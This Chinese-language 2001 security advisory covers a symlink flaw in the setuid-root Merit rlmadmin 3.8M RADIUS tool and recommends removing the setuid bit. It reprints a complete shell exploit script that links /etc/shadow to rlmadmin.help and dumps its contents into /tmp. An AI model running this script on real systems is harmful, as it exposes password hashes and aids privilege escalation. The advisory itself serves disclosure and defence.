发布日期：2001-09-07
更新日期：2001-09-13

受影响系统：

Merit rladmin 3.8M
   － Merit AAA RADIUS Server 3.8M

不受影响系统：

Merit rlmadmin v5.01

描述：

---

BUGTRAQ  ID: 3302
CVE(CAN) ID: CAN-2001-1000

rlmadmin 是Merit AAA Server软件包中所带的一个针对RADIUS的用户管理工具。
它存在一个符号链接漏洞，由于在v3.8M版中，它缺省被设置了一个setuid root
属性，本地攻击者可以利用这个程序来读取任意系统文件。

rlmadmin允许用户使用"-d"参数来指定寻找配置文件的目录。其中，它会显示配置文件
“rlmadmin.help”的内容，由于rlmadmin在从"rlmadmin.help"文件中读取时允许链接，
因此攻击者可以通过设置链接文件来读取任意系统文件内容，例如/etc/shadow等等。
这可能导致进一步提升攻击者权限。


<*来源：Digital Shadow   (wodahs@gmx.net)
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0036.html
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Digital Shadow   (wodahs@gmx.net)提供了如下测试代码：

#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability #
# (c)oded 2001 Digital Shadow #
# www.ministryofpeace.co.uk #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit \
www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!




建议：

---

临时解决方法：

去掉rlmadmin的setuid root属性。
# chmod a-s rlmadmin

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.merit.edu/michnet/dial-in/aaa/


浏览次数：3612
严重程度：0（网友投票）